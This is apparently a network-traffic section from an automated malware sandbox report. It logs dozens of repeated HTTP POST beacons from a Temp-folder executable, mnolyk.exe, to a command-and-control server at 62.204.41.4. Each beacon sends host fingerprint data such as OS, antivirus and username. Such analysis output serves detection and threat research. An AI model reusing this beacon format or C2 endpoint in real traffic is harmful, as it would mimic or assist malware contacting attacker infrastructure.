                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:30.312088013 CET | 443 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      329 | 192.168.2.7 | 50024 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:30.495661020 CET | 444 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:30.559978962 CET | 444 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      33 | 192.168.2.7 | 49727 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:09.536305904 CET | 137 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:09.600039959 CET | 137 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      330 | 192.168.2.7 | 50025 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:30.727716923 CET | 445 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:30.790111065 CET | 445 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      331 | 192.168.2.7 | 50026 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:30.966267109 CET | 446 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:31.029891968 CET | 446 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      332 | 192.168.2.7 | 50027 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:31.210464001 CET | 447 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:31.274440050 CET | 447 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      333 | 192.168.2.7 | 50028 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:31.449239016 CET | 448 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:31.512262106 CET | 448 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      334 | 192.168.2.7 | 50029 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:31.679572105 CET | 449 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:31.742604971 CET | 449 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      335 | 192.168.2.7 | 50030 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:31.914465904 CET | 450 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:31.978188992 CET | 450 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      336 | 192.168.2.7 | 50031 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:32.148799896 CET | 451 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:32.213572025 CET | 451 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      337 | 192.168.2.7 | 50032 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:32.408441067 CET | 452 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:32.471019030 CET | 452 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      338 | 192.168.2.7 | 50033 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:32.657521009 CET | 453 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:32.720254898 CET | 453 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      339 | 192.168.2.7 | 50034 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:32.903822899 CET | 454 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:32.967792988 CET | 454 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      34 | 192.168.2.7 | 49728 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:09.767108917 CET | 138 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:09.831113100 CET | 138 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      340 | 192.168.2.7 | 50035 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:33.151525021 CET | 455 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:33.214391947 CET | 455 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      341 | 192.168.2.7 | 50036 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:33.388753891 CET | 456 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:33.453290939 CET | 456 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      342 | 192.168.2.7 | 50037 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:33.640086889 CET | 457 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:33.705540895 CET | 457 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      343 | 192.168.2.7 | 50038 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:34.135274887 CET | 458 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:34.198477983 CET | 458 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      344 | 192.168.2.7 | 50039 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:34.413705111 CET | 459 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:34.476334095 CET | 459 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


